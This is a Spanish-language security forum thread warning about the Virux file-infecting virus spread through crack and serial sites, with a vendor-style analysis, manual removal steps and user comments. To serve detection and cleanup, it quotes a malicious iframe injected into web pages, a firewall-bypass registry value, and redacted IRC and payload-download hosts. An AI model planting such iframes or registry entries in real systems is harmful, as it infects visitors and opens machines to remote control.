• Registrarse
  • Iniciar sesión


  • Resultados 1 al 10 de 10

    Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

    Virux Señores, les presento al que en los proximos meses puede convertirse en un autentico dolor de cabeza para todos los amantes de pirateria, aunque no por ello los demás están a salvo los investigadores ...

          
    1. #1
      Colaborador Avatar de Herrante
      Registrado
      jun 2008
      Ubicación
      España
      Mensajes
      5.290

      Atención Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Virux

      Señores, les presento al que en los proximos meses puede convertirse en un autentico dolor de cabeza para todos los amantes de pirateria, aunque no por ello los demás están a salvo

      los investigadores de Trend Micro han descubierto que las páginas de cracks y warez están siendo utilizadas por los ciberdelincuentes para que los usuarios descarguen el malware VIRUT y VIRUX en lugar de los serials esperados.

      En las web de serials que están utilizando los ciberdelincuentes para intentar engañar a los usuarios, además de los resultados de búsqueda también hay que tener cuidado con los enlaces directos que también conducen a archivos maliciosos, así como los banners.

      El malware descargado incluye variantes de la familia de FAKEAV, TDSS, y VUNDO, además también se ha detectado la presencia de VIRUT y VIRUX malware, y según comentan desde TrendLabs en torno a 20.000 ordenadores son infectados cada día.

      Por lo que te recomendamos que tengas actualizado el antivirus, así como el sistema operativo con los últimos boletines de seguridad disponibles, para evitar ser infectado por este nuevo virus.

      ****Ampliado****

      Según informan, el virus evita el Firewall de Windows e infecta a sus víctimas usando diferentes técnicas y dispone de más de una capa de encriptación. Además el virus muta a otras variantes de él mismo que dificultan la desinfección, y se conecta a servidores IRC uniéndose a un canal para recibir y ejecutar comandos en el ordenador infectado.

      Virux también se conecta a sitios web para descargar nuevas formas de infección, a principios de esta semana se descargaba el troyano TROJ_INJECTOR.AR, sin embargo, pocas horas después se descargaba PE_VIRUX otra variante.

      Por lo que te recomendamos que tengas actualizado el antivirus, así como el sistema operativo con los últimos boletines de seguridad disponibles, para evitar ser infectado por este nuevo virus.

      Fuente

      Desinfeccion manual


      Si utiliza Windows Me, XP o Vista, y sabe cuándo se produjo la infección, puede usar la característica de ‘Restauración del Sistema’ para eliminar el virus volviendo a un punto de restauración anterior a la infección (tenga en cuenta que se desharán los cambios de configuración de Windows y se eliminarán todos los archivos ejecutables que haya creado o descargado desde la fecha del punto de restauración). Si tiene alguna duda o problema sobre el funcionamiento de esta opción puede consultar nuestras guías sobre la Restauración en Windows XP o la Restauración en Windows Vista.


      En caso de que no pueda volver a un punto de Restauración anterior o no le funcione, es recomendable que desactive temporalmente la Restauración del Sistema antes de eliminar el virus por otros medios, ya que podría haberse creado una copia de seguridad del virus. Si necesita ayuda vea Deshabilitar restauración del sistema en Vista, XP y Me. A continuación siga estos pasos para la eliminación del virus:
      1. Reinicie su ordenador en Modo Seguro o Modo a Prueba de Fallos. Si no sabe cómo se hace siga las instrucciones que se indican en este manual de Cómo iniciar su computadora en Modo a prueba de fallos.
      2. Utilice algún programa antirootkit para detener las acciones del virus que dificultan su eliminación.
      3. Con un antivirus actualizado, localice todas las copias del virus de su PC. Si no dispone de antivirus, visite nuestra página de Antivirus gratuitos.

      Nota: A Menudo los antivirus informan de que 'no puede reparar un fichero' en el caso de gusanos o troyanos debido a que no hay nada que reparar, simplemente hay que borrar el fichero.
      4. Si no se puede reparar la infección, puede ser debido a que el fichero está en uso por estar el virus en ejecución (residente en memoria).
      Debe terminar manualmente el proceso en ejecución del virus. Abra el Administrador de Tareas (presione Control+Mayúsculas+Esc). En Windows 98/Me seleccione el nombre del proceso y deténgalo. En Windows 2000/XP/Vista, en la pestaña 'Procesos' pulse con el botón derecho en el proceso y seleccione 'Terminar Proceso'. A continuación vuelva a intentar el borrado o reparación de los ficheros que se han creado por la acción del virus. Puede obtener más información en la sección "Administrador de Tareas", de la página Eliminar librerías .DLL o .EXE.
      5. Elimine las siguientes entradas de registro:

      Clave: HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
      Valor: "UpdateHost = "{valor binario aleatorio}""

      Clave: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\

      Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List

      Valor: "\??\%System%\winlogon.exe = "\??\%System%\winlogon.exe:*:enabled:@shell32.dll,-1""

      6. Elimine todos los archivos temporales del ordenador, incluidos los archivos temporales del navegador, vacíe también la Papelera de reciclaje.
      7. Reinicie su ordenador y explore todo el disco duro con un antivirus para asegurarse de la eliminación del virus. Si desactivó la restauración del sistema, recuerde volver a activarla. Cree un punto de restauración, le resultará útil para recurrir a él en caso de posibles infecciones o problemas en el futuro.

      Difusión: Baja ++ Fecha de Alta:13-02-2009
      Última Actualización:18-02-2009
      Daño: Alto

      Dispersibilidad: Alto

      Nombre completo: Virus.W32/Virux

      ipo: [Virus] - Virus Genérico, normalmente se propaga infectando archivos ejecutables.
      Plataforma: [W32] - Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003
      Alias:PE_VIRUX.A (Trend Micro), Win32/Virut.E (AhnLab), Win32/Virut.17408.A virus (Computer Associates), Win32.Virut.56 (Doctor Web), W32/Virut.AI (FRISK Software), Virus:Win32/Virut.BM (Microsoft), W32/Scribble-A (Sophos), Virus.Virut.CF (K7 Computing), W32/Sality.AO (Panda Security)

      El dato a tener en cuenta es que es confundido tanto con Virut como con Sality, háganse una idea de como actuara

      Sintomas y proceso de infeccion

      El virus crea el evento Vx_5. Ajustando los privilegios del sistema para darse a sí mismo privilegios de depuración (debug).

      Se inyecta en el proceso WINLOGON.EXE. Creando un hilo de ejecución para ejecutar su rutina de puerta trasera y deshabilitar la protección de archivos de Windows.

      Crea la siguiente entrada de registro:

      Clave: HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
      Valor: "UpdateHost = "{valor binario aleatorio}""

      También crea la siguiente entrada de registro para evitar el cortafuegos de Windows:

      Clave: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\

      Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List

      Valor: "\??\%System%\winlogon.exe = "\??\%System%\winlogon.exe:*:enabled:@shell32.dll,-1""

      Nota: %System% es una variable que hace referencia al directorio del sistema de Windows.
      Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

      Esta rutina permite hacer descargas desde el servidor IRC al que se conecte.

      Puede deshabilitar el System File Checker(SFC) del sistema. SFC es una característica de seguridad para Windows, para revertir modificaciones no autorizadas realizadas en archivos críticos del sistema. Deshabilitar este servicio SFC permite a este virus infectar archivos críticos del sistema y/o aplicaciones.

      El virus infecta los archivos del sistema añadiendo su código. Mapea NTOSKRNL.EXE en memoria para permitirse a sí mismo enganchar los procesos de creación de APIs.

      Infecta archivos del siguiente tipo:

      * .EXE
      * .SRC

      No infecta archivos que contengan las siguientes cadenas de carácteres en su nombre:

      * OTSP
      * WC32
      * WCUN
      * WINC

      No infecta archivos con las siguientes características:

      * archivos .DLL
      * archivos PE con una sección llamada "_win"
      * archivos ejecutables MZ con una marca de infección en el offset 0x20 o 0x1c

      Infecta archivos de secuencias de comandos si la extensión es:

      * .ASP
      * .HTM
      * .PHP

      Una vez que encuentra un archivo de sencuencia de comandos crea una marca para infectarlo con un iFrame. Abre los archivos marcados y comprueba que exista una cierta cadena de caracteres. Si encuentra la cadena infecta el archivo.

      Busca la cadena </BODY> en un archivo de secuencia de comandos. Si la encuentra, infecta el achivo insertando código iFrame malicioso con el siguiente códgigo:

      <iframe src="http://[eliminado].pl/rc" with=1 height=2 style="border:0"></iframelt>

      Los archivos infectados son localizados como copias del virus y los archivos de secuencia de comandos como HTML_IFRAME.NV.

      Monitoriza la siguientes APIs para conectar todas las instancias de NTDLL.DLL

      * CreateFile
      * CreateProcess
      * CreateProcessEx
      * OpenFile
      * QueryInformationProcess

      Esta API es utilizada para ejecutar o acceder al archivo, así un fichero será infectado si es ejecutado o leído.

      Infecta los archivos ejecutables de varias formas: Anexándose al principio del fichero ejecutable, anexándose al final, introduciendo sus tipos de código en las partes sin contenido del fichero (conocido por infección de cavidad) o por ocultación del punto de entrada (del inglés, Entry Point Ofuscation, EPO). También usa una rutina de encriptación multicapa.

      Se conecta a uno de los siguientes servidores IRC usanco el puerto 80:

      * [eliminado]f.pl
      * [eliminado].ircgalaxy.pl

      Esta rutina se ejecuta cada 30 segundos, generando un NICK y USER aleatorio por cada intento.

      Una vez conectado, se une a un canal que recibe y ejectua comandos en el sistema afectado, por lo que el ordenador infectado puede llegar a funcionar como una BotNet.

      El atacante remoto ejecuta comandos en el sistema infectado para descargar y ejecutar código maliciosos de las siguietes URL:

      * http://[eliminado].cn/ex/0032.exe - detectado como TROJ_INJECTOR.AR

      Esta rutina efectivamente compromete el sistema de seguridad del sistema afectado. La URL a la que se conecta, y el malware descargado puede cambiar dependiendo de las solicitudes del usuario remoto.

      El virus modifica el archivo HOST, insertando la siguiente entrada al principo del fichero

      * 127.0.0.1 [eliminado]F.pl

      NOTA: El fichero "Hosts" normalmente se encuentra ubicado en "%System%\drivers\etc\".
      Método de Propagación

      El virus se propaga dejando copias de sí mismo en varios ficheros ejecutables .EXE y .SCR.

      Puede llegar al sistema al ejecutar un fichero infectado, o desde Internet al visitar una página Web que contiene un iframe que enlaza a una página maliciosa.
      Otros Detalles

      Su MD5 es: c767b56f2cb2025b720d5e94ebbaa593

      **Casi no llego a publicarlo porque ya me iba y el hallazgo me llego de refilon pero por suerte llego justo a tiempo**

      Anden con ojo, ya que se transmite también por Iframes y la difusión va en aumento

      Fuente 2
      Última edición por Herrante fecha: 25/03/09 a las 21:36:48
      Un autentico héroe es aquel que ayuda a los demás sin esperar nada a cambio


      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    2. #2
      Usuario Avatar de centralkong
      Registrado
      ene 2009
      Ubicación
      A maìson in Archades
      Mensajes
      117

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Rayos. Otro más? Win32/Sality y Win32/Virut eran suficientes... y ahora un "Win32/Virux"?
      Esto va para peor... ahora casi ni se puede navegar por la red sin estar casi en la boca de la serpiente, y si te muerde no te queda otra que morirte y renacer...
      Rayos.

    3. #3
      Tix
      Tix está offline
      Usuario Avatar de Tix
      Registrado
      mar 2009
      Ubicación
      Buenos Aires.
      Mensajes
      202

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      ¿Queeeeeeeeeeeeee?

      Noooo......... que asco de mundo, asi no se puede... ahora a estas alturas hay que tener tropecientos programas de seguridad para estar protegido

    4. #4
      Usuario Avatar de JuanD:
      Registrado
      jul 2008
      Ubicación
      Venezuela
      Mensajes
      1.962

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Hola

      Otro mas, Sality, virut y ahora el virux, de verdad ya esto esta al limite ya saben a cuidarse no descargen crack ni seriales....


      Saludos

    5. #5
      Ex-Colaboradora Avatar de Maggots_1
      Registrado
      oct 2008
      Ubicación
      >>> Cr., Mvd, U
      Mensajes
      1.450

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Gracias por la informacion HERRANTE

      Cual será la proxima... viruz?

      Actualizen El S.O, Antivirus,
      Y Cuidado con las descargas de
      Keygens, cracks y serials
      ...
      .. sera eficaz la Desinfeccion Manual
      como la plantean en la pag?? .. y mas si es tan nocivo
      como sality o virut

      Saludos --

    6. #6
      Usuario Avatar de Nizax
      Registrado
      ago 2008
      Ubicación
      Argentina
      Mensajes
      4.870

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Hola a todos, habra que tener cuidado, cada vez es peor y encima vienen todos juntos (me refiero a que aparecieron seguidos). Bueno saludos y a Herrante por la informacion.

    7. #7
      Usuario Avatar de centralkong
      Registrado
      ene 2009
      Ubicación
      A maìson in Archades
      Mensajes
      117

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Cita Originalmente publicado por Maggots_1 Ver Mensaje
      Gracias por la informacion HERRANTE

      Keygens, cracks y serials
      Los serials no son archivos txt? no me pregunten más

      Ah y por cierto HERRANTE, no sirve de nada ocultar qué es lo "eliminado" en 127.0.0.0 ****f.pl xD
      En cualquier blog de empresas antivirus lo dicen
      Y lo mismo con ircgalaxy.pl
      Última edición por centralkong fecha: 30/03/09 a las 19:33:04 Razón: HERRANTE, HERRANTE, HERRANTE...

    8. #8
      Colaborador Avatar de Herrante
      Registrado
      jun 2008
      Ubicación
      España
      Mensajes
      5.290

      Mensaje Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      1- si, son archivos txt, pero ya ha habido muchos que se han tragado la trampa de ejecutar un supuesto serial.exe

      2- Lo eliminado no lo elimino yo, lo eliminaron desde la fuente supuesta mente por seguridad, yo solo publique aquí la información, consulta la fuente para cerciorarte de ello.
      Un autentico héroe es aquel que ayuda a los demás sin esperar nada a cambio


      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    9. #9
      Ex-Colaboradora Avatar de Maggots_1
      Registrado
      oct 2008
      Ubicación
      >>> Cr., Mvd, U
      Mensajes
      1.450

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Cita Originalmente publicado por centralkong Ver Mensaje
      Los serials no son archivos txt? no me pregunten más
      Si centralkong pero.. he visto en ocasiones infecciones por presuntos
      "serial.exe" en archivos comprimidos y mayormente propagados por medio de P2P

      Así que ya lo dice la frase... "Persona precavida vale por tres"

      Saludos --

    10. #10
      Ex-Colaborador Avatar de Damianl_77
      Registrado
      ene 2008
      Ubicación
      Argentina
      Mensajes
      23.694

      Re: Nueva pesadilla: Virux, nuevo infector + destructor de ejecutables

      Cita Originalmente publicado por juuanD: Ver Mensaje
      Hola

      Otro mas, Sality, virut y ahora el virux, de verdad ya esto esta al limite ya saben a cuidarse no descargen crack ni seriales....


      Saludos
      Muy bien eso es no difundir la piratería

      Blog | Antivirus Online | Eliminar Malwares | Antivirus Gratis


      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.